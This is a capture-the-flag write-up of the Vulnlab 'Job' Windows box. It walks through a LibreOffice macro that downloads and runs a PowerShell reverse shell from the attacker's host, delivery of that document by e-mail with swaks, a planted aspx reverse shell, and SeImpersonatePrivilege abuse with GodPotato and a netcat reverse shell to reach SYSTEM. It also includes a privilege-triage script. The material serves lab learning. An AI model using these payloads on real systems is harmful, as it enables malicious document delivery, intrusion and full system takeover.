Job is a medium Windows machine from Vulnlab created by xct. It involves getting Remote Code Execution (RCE) through a macro in a LibreOffice document delivered by e-mail, pivoting to the IIS application pool identity via a writable web root, and abusing SeImpersonatePrivilege to escalate to SYSTEM.

Recon

NMAP

Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-23 13:52 EDT
Nmap scan report for 10.10.69.83
Host is up (0.083s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Job.local
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: JOB
| NetBIOS_Domain_Name: JOB
| NetBIOS_Computer_Name: JOB
| DNS_Domain_Name: job
| DNS_Computer_Name: job
| Product_Version: 10.0.20348
|_ System_Time: 2023-10-23T17:52:39+00:00
| ssl-cert: Subject: commonName=job
| Not valid before: 2023-10-22T17:51:29
|_Not valid after: 2024-04-22T17:51:29
|_ssl-date: 2023-10-23T17:53:18+00:00; -1s from scanner time.
Service Info: Host: JOB; OS: Windows; CPE: cpe:/o:microsoft:windows

The Nmap scan shows four open ports: SMTP on 25 (hMailServer), HTTP on 80 (Microsoft IIS 10.0), SMB on 445, and RDP on 3389. The RDP NTLM info gives the hostname job and build 10.0.20348 (Windows Server 2022), and the HTTP title is Job.local, so let's add job.local to our hosts file. Note that the SMTP banner advertises AUTH LOGIN but, as we will see, the server accepts mail for local recipients without authenticating.

Web

If we go to the website on port 80, we can see a note saying

Please send your application to career@job.local! We recently switched to using open source products - please send your cv as a libre office document.

Shell as jack.black

The note on the website hints at crafting a malicious macro and using it to get RCE. To do this, I will follow this great writeup by 0xdf, which has a section explaining how to build a LibreOffice macro that runs a system command when the document is opened: https://0xdf.gitlab.io/2020/02/01/htb-re.html. The important detail is that the macro has to be bound to the document's Open Document event (Tools > Customize > Events, saved in the document rather than in the application), so it fires as soon as whoever processes the mailbox opens the attachment; it also relies on the recipient's LibreOffice macro security level allowing document macros to run.
The payload I am going to use is the following

REM  *****  BASIC  *****

Sub Main

Shell("cmd /c powershell ""iex(new-object net.webclient).downloadstring('http://10.8.0.210/shell.ps1')""")

End Sub

Now, after saving the file as <filename>.odt, let's start a Python web server to host shell.ps1 (the PowerShell reverse shell the macro downloads, pointing back at 10.8.0.210:443) and a netcat listener for the callback

python3 -m http.server 80
nc -nlvp 443

At this point all we have to do is send the malicious file to the address from the website, career@job.local. I will use the swaks command to send it; it talks directly to hMailServer on job.local port 25, and no authentication is needed for a local recipient

➜  job swaks --to career@job.local --header "CV" --body "meow" --attach meow.odt --server job.local

Wait a few seconds and we get a shell as the user jack.black, spawned from the LibreOffice program directory (so the document really was opened by soffice), and we can read the user flag.

➜  job nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.0.210] from (UNKNOWN) [10.10.69.83] 54092

PS C:\Program Files\LibreOffice\program> whoami
job\jack.black

PrivEsc

Shell as apppool\defaultapppool

If we look at the web root C:\inetpub\wwwroot, it turns out to be writable by jack.black. IIS runs the site under an application pool identity, so dropping a web shell there gets us code execution as that account, and app pool identities hold SeImpersonatePrivilege by default, which we can then abuse to escalate privileges.
Let’s prepare our aspx shell using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.0.210 LPORT=443 -f aspx -o exploit.aspx

Now we need to transfer it to the target machine and put it inside the wwwroot folder

PS C:\inetpub\wwwroot> iwr http://10.8.0.210/exploit.aspx -outfile exploit.aspx
PS C:\inetpub\wwwroot> ls


Directory: C:\inetpub\wwwroot


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/10/2021 8:52 PM aspnet_client
d----- 11/9/2021 9:24 PM assets
d----- 11/9/2021 9:24 PM css
d----- 11/9/2021 9:24 PM js
-a---- 10/23/2023 6:57 PM 3412 exploit.aspx

At this point, all we have to do is trigger it by requesting the following URL (a browser visit or a plain curl both work)

http://10.10.69.83/exploit.aspx

We get a shell as the application pool identity

➜  www nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.0.210] from (UNKNOWN) [10.10.69.83] 54509
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

Shell as system

If we run whoami /all, we can see that SeImpersonatePrivilege is enabled

SeImpersonatePrivilege Impersonate a client after authentication Enabled
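Before reaching for a Potato it is worth triaging the whole privilege table rather than eyeballing one line. The parser below is an added example, not part of the writeup: it reads `whoami /all` output by section and reports every held privilege with a known escalation path, including ones shown as Disabled, since a privilege present in the token can be re-enabled by the process itself and the Potato tools do exactly that. The sample output is constructed to resemble the app-pool shell above (the SID is the well-known DefaultAppPool one); the technique notes are general knowledge, not claims about this box.

```python
"""Triage `whoami /all` output for token privileges with a known path to SYSTEM.
Added example, not from the writeup. SAMPLE is constructed to resemble the IIS
app-pool shell in the post (the SID is the well-known DefaultAppPool one)."""
import re

# Held privileges that routinely turn into SYSTEM from an unprivileged shell,
# with the technique family each one enables.
ABUSABLE = {
    "SeImpersonatePrivilege": "impersonate a SYSTEM token (Potato family, e.g. GodPotato)",
    "SeAssignPrimaryTokenPrivilege": "assign a SYSTEM token to a new process (Potato family)",
    "SeBackupPrivilege": "read any file, e.g. copy the SAM and SYSTEM hives",
    "SeRestorePrivilege": "write any file, e.g. replace a service binary",
    "SeTakeOwnershipPrivilege": "take ownership of protected files and registry keys",
    "SeDebugPrivilege": "open SYSTEM processes and steal their tokens",
    "SeLoadDriverPrivilege": "load a signed but vulnerable kernel driver",
    "SeManageVolumePrivilege": "raw volume access to overwrite protected files",
}

USER_RE = re.compile(r"^(\S.*?)\s+(S-1-[\d-]+)\s*$")
PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_whoami_all(text):
    """Return (user name, {privilege: state}). Sections are located by their
    'XXX INFORMATION' banner; rows are matched by shape, not by column offset,
    so varying column widths do not break the parse."""
    user, privileges, section = None, {}, None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.endswith("INFORMATION"):
            section = stripped
        elif section == "USER INFORMATION":
            m = USER_RE.match(line)
            if m:
                user = m.group(1)
        elif section == "PRIVILEGES INFORMATION":
            m = PRIV_RE.match(line)
            if m:
                privileges[m.group(1)] = m.group(2)
    return user, privileges


def triage(text):
    """List (privilege, state, what it enables) for every abusable privilege the
    token holds. Disabled ones are reported too: a privilege present in the token
    can be re-enabled by the process itself (AdjustTokenPrivileges)."""
    _, privileges = parse_whoami_all(text)
    return [(name, state, ABUSABLE[name])
            for name, state in privileges.items() if name in ABUSABLE]


# Constructed sample, shaped like `whoami /all` from the DefaultAppPool shell.
SAMPLE = r"""
USER INFORMATION
----------------

User Name                  SID
========================== ============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

if __name__ == "__main__":
    user, _ = parse_whoami_all(SAMPLE)
    print(f"token owner: {user}")
    for name, state, note in triage(SAMPLE):
        print(f"  {name:<32} {state:<9} {note}")
```

Paste the real output into SAMPLE (or read it from a file) and the same two findings come out for this box: SeImpersonatePrivilege enabled, SeAssignPrimaryTokenPrivilege held but disabled, both of which point at the Potato family used next.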

We can exploit this privilege with GodPotato, available at https://github.com/BeichenDream/GodPotato/releases.
First, let's pull gp.exe (the GodPotato binary, renamed) and nc64.exe from our box into a writable directory such as C:\temp, and start a fresh netcat listener on 443

PS C:\temp> iwr http://10.8.0.210/nc64.exe -outfile nc64.exe
PS C:\temp> iwr http://10.8.0.210/gp.exe -outfile gp.exe

Finally, run GodPotato with a command that spawns a reverse shell back to our listener

PS C:\temp> .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.0.210 443"
.\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.0.210 443"
[*] CombaseModule: 0x140714150002688
[*] DispatchTable: 0x140714152593272
[*] UseProtseqFunction: 0x140714151886704
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\d6ce89f6-a7b7-49fb-8d78-94633587bf42\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000ec02-11a4-ffff-e4d8-ec29d0ee3ee7
[*] DCOM obj OXID: 0xa8bd8a068d938289
[*] DCOM obj OID: 0x1eb21eda1a714cb1
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 976 Token:0x732 User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 4080

And we have a shell as SYSTEM, from which we can read the root flag.

➜  www nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.0.210] from (UNKNOWN) [10.10.69.83] 54659

Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

C:\temp>
C:\temp>whoami
nt authority\system

C:\temp>type C:\users\administrator\desktop\root.txt
VL{REDACTED}

That concludes the box. I hope you learned something new :D